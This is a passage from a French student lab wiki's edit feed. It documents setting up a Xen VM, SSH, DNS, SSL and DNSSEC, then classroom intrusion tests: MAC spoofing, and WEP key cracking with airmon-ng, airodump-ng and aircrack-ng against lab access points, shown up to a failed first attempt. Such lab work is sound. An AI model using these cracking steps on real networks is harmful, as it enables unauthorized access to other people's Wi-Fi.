On lance le serveur FreeRadius via freeradius -X (mode debug).&lt;br /&gt;
Sur smartphone, nous arrivons à détecter notre SSID (SSID_GREENARROW). Nous pouvons également ping notre eeePC depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Configuration d'un PCBX ====&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35764</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35764"/>
				<updated>2016-12-08T10:19:32Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Cryptage de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
